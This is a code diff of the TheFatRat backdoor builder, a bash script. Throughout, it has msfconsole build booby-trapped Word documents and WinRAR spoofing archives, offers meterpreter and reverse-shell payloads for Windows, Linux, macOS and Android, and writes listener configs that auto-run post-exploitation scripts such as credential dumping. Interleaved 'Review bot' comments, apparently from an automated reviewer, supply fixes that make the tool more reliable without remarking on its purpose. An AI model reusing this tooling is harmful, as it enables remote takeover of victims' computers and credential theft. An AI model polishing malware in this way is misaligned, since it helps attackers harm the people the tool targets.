@@ -1335,14 +2174,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1351,7 +2190,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1372,7 +2212,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi @@ -1392,14 +2232,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1408,7 +2248,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] 
@@ -1429,7 +2270,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi @@ -1448,14 +2289,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1465,7 +2306,8 @@ fi echo echo -e $yellow" Worked on Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] " echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] 
@@ -1488,22 +2330,23 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 - spinlong + +pldwin +spinlong echo "" echo "" gboor spinlong echo "" rm -rf ~/.msf4/local/* >/dev/null 2>&1 - xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'" + xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set PAYLOAD $payload ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'" echo "" - mv ~/.msf4/local/$fira.doc $path/output/$fira.doc + mv ~/.msf4/local/$fira.doc $path/output/$fira.doc >/dev/null 2>&1 echo -e $okegreen"" # Checking if file was created fileout="$path/output/$fira.doc" @@ -1512,14 +2355,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi 
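Review bot: The rebuilt `xterm -e "$msfconsole -x '... set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; ...'"` line splices prompt input into a single-quoted msfconsole script, so a value containing a quote, `;` or whitespace changes the script rather than being passed as data; `invalid` runs earlier, but nothing visible in this hunk restricts the characters. Validate before this line, e.g. `[[ $fira =~ ^[A-Za-z0-9._-]+$ ]] || err=1` and `[[ $yourport =~ ^[0-9]+$ ]] || err=1`, and quote `"$fira"` in the following `mv`. The added `>/dev/null 2>&1` on that `mv` discards the reason when the move fails, while the `-f "$fileout"` test below only says "error in the creation"; redirecting to `>>$log 2>&1` as the other steps do keeps the diagnostic.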
@@ -1529,7 +2372,8 @@ fi echo echo -e $yellow" Worked on All Windows " echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1551,7 +2395,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi @@ -1563,7 +2407,7 @@ then fira2="stuff.txt" fi echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 +pldwin spinlong echo "" echo "" @@ -1571,7 +2415,7 @@ fi spinlong echo "" rm -rf ~/.msf4/local/* >/dev/null 2>&1 - xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'" + xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payload; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'" echo "" mv ~/.msf4/local/$fira $path/output/$fira 
@@ -1582,14 +2426,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1637,10 +2481,11 @@ echo -e $okegreen" ============================================================ rm temp/*.rc > /dev/null 2>&1 touch "temp/meterpreter_linux.rc" echo use exploit/multi/handler > "temp/meterpreter_linux.rc" - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "linux/ppc/shell_reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 - echo set PAYLOAD $payload >> "temp/meterpreter_linux.rc" + pldlnx + echo set PAYLOAD $payload >> "temp/meterpreter_linux.rc" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1655,7 +2500,7 @@ invalid1 if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp clisteners fi 
@@ -1663,29 +2508,73 @@ fi echo set LPORT $yourport >> "temp/meterpreter_linux.rc" echo set ExitOnSession false >> "temp/meterpreter_linux.rc" echo exploit -j >> "temp/meterpreter_linux.rc" - zenity --question --text="Do you want to save this configuration to use in future ?" - if [ $? = 0 ] ; then - save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="linux-config"); - cp $path/temp/meterpreter_linux.rc $list/$save.rc >/dev/null 2>&1 + echo "" + echo -e $okegreen "Do you want to save this configuration to use in future ?" + echo "" + echo -ne "Choose y/n :" ;tput sgr0 + read svl + case $svl in + +y|Y|Yes|YES|yes) + echo "" + echo -e $okegreen "Write the name for this config. (ex: linux-config)" + echo "" + echo -ne $cyan "Filename : " ;tput sgr0 + read fln + +#empty input then save as default name +if [ -z $fln ] + then + cp $path/temp/meterpreter_linux.rc $list/linux-config.rc >/dev/null 2>&1 + echo "Empty input detected , configuration file as linux-config.rc " + echo "to: $list/linux-config.rc" + echo "" + echo -e $yellow "" + echo "To load this configuration press on this menu 5 and select linux-config.rc" +echo "" echo -e $okegreen "" -echo "Configuration file saved to $list/$save.rc " -echo "" -echo -e $yellow "" -echo "To load this configuration press on this menu 5 and select $save.rc" -fi + echo -ne $okegreen"Press [ENTER] key to return to menu ." + read continue + clisteners + fi + +#input detected +cp $path/temp/meterpreter_linux.rc $list/$fln.rc >/dev/null 2>&1 + echo "Configuration file saved as $fln.rc " + echo "to: $list/$fln.rc" + echo "" + echo -e $yellow "" + echo "To load this configuration press on this menu 5 and select $fln.rc" echo "" + echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +n|no|No|NO) echo -e $okegreen "" -echo -ne $okegreen" Press any key to continue ......... 
" -read continue -clisteners - + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; + +*) +echo "" +echo -e $red "Invalid Input" +echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +esac + elif test $fatrat1 == '2' #Windows then touch "temp/meterpreter_windows.rc" echo use exploit/multi/handler >> "temp/meterpreter_windows.rc" - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/powershell_bind_tcp" FALSE "windows/powershell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 - echo set PAYLOAD $payload >> "temp/meterpreter_windows.rc" - pe=$(zenity --list --title "☣ TheFatRat ☣" --text "\npost-exploitation module to run" --radiolist --column "Pick" --column "Option" TRUE "sysinfo.rc" FALSE "fast_migrate.rc" FALSE "cred_dump.rc" FALSE "gather.rc" FALSE "auto_migrate+killfirewall.rc" --width 350 --height 240) > /dev/null 2>&1 + pldwin + echo set PAYLOAD $payload >> "temp/meterpreter_windows.rc" + postexp echo -e $okegreen"" echo -e $yellow " Your local IP address is : $lanip" echo -e $yellow " Your public IP address is : $publicip" 
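Review bot: In the `y)` arm the empty-input branch calls `clisteners` but never leaves the arm, so when that nested menu returns, control falls through to `cp $path/temp/meterpreter_linux.rc $list/$fln.rc` with `fln` still empty and writes `$list/.rc`; the `cp` also takes `fln` verbatim, so a name containing `/` or `..` lands outside `$list`. Folding the default into the variable and stripping any directory part removes both the duplicated branch and the fallthrough; the same pattern is repeated in the Windows, Mac and Android arms of the next three hunks. `clisteners` itself begins before this hunk. The Windows context at the end of this hunk also still prints only `Your local IP address`, while the Linux and Mac arms gained the IPV4/IPV6 pair.
```shell
  read fln
  # the answer is a file name only: drop any directory part, then apply the default
  fln=${fln##*/}
  fln=${fln:-linux-config}
  cp "$path/temp/meterpreter_linux.rc" "$list/$fln.rc" >/dev/null 2>&1
  echo "Configuration file saved as $fln.rc "
  echo "to: $list/$fln.rc"
  # … unchanged: load hint, press-ENTER prompt, clisteners …
;;
```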
@@ -1702,39 +2591,82 @@ invalid1 if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp clisteners fi echo set LHOST $yourip >> "temp/meterpreter_windows.rc" echo set LPORT $yourport >> "temp/meterpreter_windows.rc" - echo set AutoRunScript multi_console_command -rc $path/postexploit/$pe >> "temp/meterpreter_windows.rc" + echo set AutoRunScript multi_console_command -rc $pe >> "temp/meterpreter_windows.rc" echo set ExitOnSession false >> "temp/meterpreter_windows.rc" echo exploit -j >> "temp/meterpreter_windows.rc" - zenity --question --text="Do you want to save this configuration to use in future ?" - if [ $? = 0 ] ; then - save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="windows-config"); - cp $path/temp/meterpreter_windows.rc $list/$save.rc >/dev/null 2>&1 - echo -e okegreen "" - echo "Configuration file saved to $list/$save.rc " echo "" -echo -e $yellow "" -echo "To load this configuration press on this menu 5 and select $save.rc" -fi +echo -e $okegreen "Do you want to save this configuration to use in future ?" + echo "" + echo -ne "Choose y/n :" ;tput sgr0 + read svl + case $svl in +y|Y|Yes|YES|yes) + echo "" + echo -e $okegreen "Write the name for this config. (ex: windows-config)" + echo "" + echo -ne $cyan "Filename : " ;tput sgr0 + read fln + +#empty input then save as default name +if [ -z $fln ] + then + cp $path/temp/meterpreter_windows.rc $list/windows-config.rc >/dev/null 2>&1 + echo "Empty input detected , configuration file as windows-config.rc " + echo "to: $list/windows-config.rc" + echo "" + echo -e $yellow "" + echo "To load this configuration press on this menu 5 and select windows-config.rc" echo "" -echo -e $okegreen "" -echo -ne $okegreen" Press any key to continue ......... 
" -read continue -clisteners + echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu ." + read continue + clisteners + fi - elif test $fatrat1 == '3' #Mac +#input detected +cp $path/temp/meterpreter_windows.rc $list/$fln.rc >/dev/null 2>&1 + echo "Configuration file saved as $fln.rc " + echo "to: $list/$fln.rc" + echo "" + echo -e $yellow "" + echo "To load this configuration press on this menu 5 and select $fln.rc" +echo "" + echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +n|no|No|NO) +echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +*) +echo "" +echo -e $red "Invalid Input" +echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +esac + + elif test $fatrat1 == '3' #Mac then rm temp/*.rc > /dev/null 2>&1 touch "temp/meterpreter_mac.rc" echo use exploit/multi/handler > "temp/meterpreter_mac.rc" echo set PAYLOAD osx/x86/shell_reverse_tcp >> "temp/meterpreter_mac.rc" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1749,7 +2681,7 @@ invalid1 if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp clisteners fi 
@@ -1757,29 +2689,71 @@ fi echo set LPORT $yourport >> "temp/meterpreter_mac.rc" echo set ExitOnSession false >> "temp/meterpreter_mac.rc" echo exploit -j >> "temp/meterpreter_mac.rc" - zenity --question --text="Do you want to save this configuration to use in future ?" - if [ $? = 0 ] ; then - save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="mac-config"); - cp $path/temp/meterpreter_mac.rc $list/$save.rc >/dev/null 2>&1 - echo -e okegreen "" - echo "Configuration file saved to $list/$save.rc " echo "" -echo -e $yellow "" -echo "To load this configuration press on this menu 5 and select $save.rc" -fi +echo -e $okegreen "Do you want to save this configuration to use in future ?" + echo "" + echo -ne "Choose y/n :" ;tput sgr0 + read svl + case $svl in +y|Y|Yes|YES|yes) + echo "" + echo -e $okegreen "Write the name for this config. (ex: mac-config)" + echo "" + echo -ne $cyan "Filename : " ;tput sgr0 + read fln + +#empty input then save as default name +if [ -z $fln ] + then + cp $path/temp/meterpreter_mac.rc $list/mac-config.rc >/dev/null 2>&1 + echo "Empty input detected , configuration file as mac-config.rc " + echo "to: $list/mac-config.rc" + echo "" + echo -e $yellow "" + echo "To load this configuration press on this menu 5 and select mac-config.rc" echo "" + echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu ." + read continue + clisteners + fi + +#input detected +cp $path/temp/meterpreter_mac.rc $list/$fln.rc >/dev/null 2>&1 + echo "Configuration file saved as $fln.rc " + echo "to: $list/$fln.rc" + echo "" + echo -e $yellow "" + echo "To load this configuration press on this menu 5 and select $fln.rc" +echo "" + echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +n|no|No|NO) echo -e $okegreen "" -echo -ne $okegreen" Press any key to continue ......... 
" -read continue -clisteners + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +*) +echo "" +echo -e $red "Invalid Input" +echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +esac elif test $fatrat1 == '4' #Android then rm temp/*.rc > /dev/null 2>&1 touch "temp/meterpreter_android.rc" echo use exploit/multi/handler > "temp/meterpreter_android.rc" - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 - echo set PAYLOAD $payload >> "temp/meterpreter_android.rc" + pldand + echo set PAYLOAD $payload >> "temp/meterpreter_android.rc" echo -e $okegreen"" echo -e $yellow " Your local IP address is : $lanip" echo -e $yellow " Your public IP address is : $publicip" @@ -1796,7 +2770,7 @@ invalid1 if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp clisteners fi 
@@ -1804,53 +2778,141 @@ fi echo set LPORT $yourport >> "temp/meterpreter_android.rc" echo set ExitOnSession false >> "temp/meterpreter_android.rc" echo exploit -j >> "temp/meterpreter_android.rc" - zenity --question --text="Do you want to save this configuration to use in future ?" - if [ $? = 0 ] ; then - save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="android-config"); - cp $path/temp/meterpreter_android.rc $list/$save.rc >/dev/null 2>&1 - echo -e okegreen "" - echo "Configuration file saved to $list/$save.rc " echo "" -echo -e $yellow "" -echo "To load this configuration press on this menu 5 and select $save.rc" -fi +echo -e $okegreen "Do you want to save this configuration to use in future ?" + echo "" + echo -ne "Choose y/n :" ;tput sgr0 + read svl + case $svl in +y|Y|Yes|YES|yes) + echo "" + echo -e $okegreen "Write the name for this config. (ex: android-config)" + echo "" + echo -ne $cyan "Filename : " ;tput sgr0 + read fln + +#empty input then save as default name +if [ -z $fln ] + then + cp $path/temp/meterpreter_android.rc $list/android-config.rc >/dev/null 2>&1 + echo "Empty input detected , configuration file as android-config.rc " + echo "to: $list/android-config.rc" + echo "" + echo -e $yellow "" + echo "To load this configuration press on this menu 5 and select android.rc" echo "" + echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu ." + read continue + clisteners + fi + +#input detected +cp $path/temp/meterpreter_android.rc $list/$fln.rc >/dev/null 2>&1 + echo "Configuration file saved as $fln.rc " + echo "to: $list/$fln.rc" + echo "" + echo -e $yellow "" + echo "To load this configuration press on this menu 5 and select $fln.rc" +echo "" + echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . 
" + read continue + clisteners +;; +n|no|No|NO) echo -e $okegreen "" -echo -ne $okegreen" Press any key to continue ......... " -read continue -clisteners + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +*) +echo "" +echo -e $red "Invalid Input" +echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +esac + elif test $fatrat1 == '5' then - listener=$(zenity --file-selection --file-filter='RC files (rc) | *.rc' --title="Load your config file" --filename=$path/config/listeners/ ); - ret=$? - if [ $ret = "0" ]; then - xterm -fa monaco -fs 13 -bg black -e $msfconsole -r $listener + echo "" + if [ -e $list/*.rc ] + then + echo -e $orange "+-------------------------+" + echo -e $orange "|$okegreen Current saved listeners$orange |" + echo -e $orange "+-------------------------+" + for liste in config/listeners/*.rc; do + echo ${liste##*/} + done + echo "" + echo -e $orange "+-------------------------+" + echo "" + echo -e $okegreen "Write the listener config file you want to load in msfconsole" + echo "" + echo -ne "Filename : ";tput sgr0 + read fname + if [ -z $fname ] + then + clear + clisteners + fi + if [ ! -f $list/$fname ] + then + echo "" + echo -e $red "The filename you wrote ($fname) do not exist in this list :" + echo "" + echo -e $orange "+-------------------------+" + echo -e $orange "|$okegreen Current saved listeners$orange |" + echo -e $orange "+-------------------------+" + echo -e $okegreen "" + for liste in config/listeners/*.rc; do + echo ${liste##*/} + done + echo "" + echo -e $yellow "Make sure you write the correct filename to load" + echo "" + echo -e $okegreen "Press [ENTER] key to return to menu" + read nfln + clear + clisteners + fi + xterm -fa monaco -fs 13 -bg black -e $msfconsole -r $list/$fname clear menu - fi - if [ $ret = "1" ]; then + else + echo -e $yellow "No listeners configuration files were found." 
+ echo "" + echo -e $okegreen "Press [ENTER] key to return to menu" + read nfln clear - fi - - elif test $fatrat1 == '6' + clisteners + fi + + elif test $fatrat1 == '6' then clear menu else echo -e " Incorrect Number" fi - echo -n -e " Do you want exit Fatrat ? ( Yes / No ) : " + echo -n -e " Do you want exit Fatrat ? ( y/n ) : " read back - if [ $back != 'n' ] && [ $back != 'N' ] - then - - clear - exit - elif [ $back != 'y' ] && [ $back != 'Y' ] - then - clisteners - fi + case $back in +y|Y|Yes|YES|yes) +clear +exit +;; +n|N|No|NO|no) +clisteners +;; +*) +clisteners +;; +esac } @@ -1896,7 +2958,8 @@ case $choice in 1) echo -e $red" Worked on Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] " echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1918,12 +2981,12 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp microsploit fi echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 + pldwin spinlong echo "" echo "" 
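Review bot: In option `5`, `if [ -e $list/*.rc ]` only works while exactly one config exists: with two or more saved listeners the glob expands to several words, `test` reports too many arguments and the `else` branch announces that no configuration files were found. Counting the matches instead, e.g. `set -- "$list"/*.rc; if [ -e "$1" ]`, handles any number. The listing loop also globs the relative `config/listeners/*.rc` while every other line uses `$list`, and `$fname` reaches `[ ! -f $list/$fname ]` and `xterm … -r $list/$fname` unquoted and unsanitised, so `fname=${fname##*/}` before the check is worth adding; as in the other arms, the empty-input `clisteners` call falls through when it returns. Separately, the Android empty-input hint says `select android.rc` while the file written is `android-config.rc`.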
@@ -1933,7 +2996,7 @@ fi rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/windows/fileformat/ms12_027_mscomctl_bof" >$meterp - echo "set PAYLOAD $payloads" >> $meterp + echo "set PAYLOAD $payload" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.doc" >> $meterp @@ -1956,13 +3019,13 @@ fi then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.doc " echo -e - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit fi ;; @@ -1970,7 +3033,8 @@ fi 2) echo -e $red"\n Worked on Microsoft Office on Windows " echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1993,7 +3057,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp microsploit fi @@ -2013,8 +3077,8 @@ fi then #payload n echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 - spinlong + pldwin + spinlong echo "" echo "" gboor 
@@ -2023,7 +3087,7 @@ fi rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/fileformat/office_word_macro" >$meterp - echo "set PAYLOAD $payloads" >> $meterp + echo "set PAYLOAD $payload" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.docm" >> $meterp @@ -2047,23 +3111,22 @@ fi then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.docm " echo -e - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit fi elif [ $exe != 'n' ] && [ $exe != 'N' ] then #payload y + selexe echo "" - exef=$(zenity --file-selection --file-filter='EXE files (exe) | *.exe' --title="Select your backdoor executable file"); - echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 + pldwin spinlong echo "" echo "" @@ -2073,7 +3136,7 @@ fi rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/fileformat/office_word_macro" >$meterp - echo "set PAYLOAD $payloads" >> $meterp + echo "set PAYLOAD $payload" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.docm" >> $meterp 
@@ -2098,13 +3161,13 @@ fi then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.docm " echo -e - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit fi fi @@ -2113,7 +3176,8 @@ fi 3) echo -e $red" Worked on Libre Office on Mac ( Python ) " echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -2136,7 +3200,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp microsploit fi @@ -2158,8 +3222,7 @@ fi then #payload n - echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "generic/shell_reverse_tcp" --width 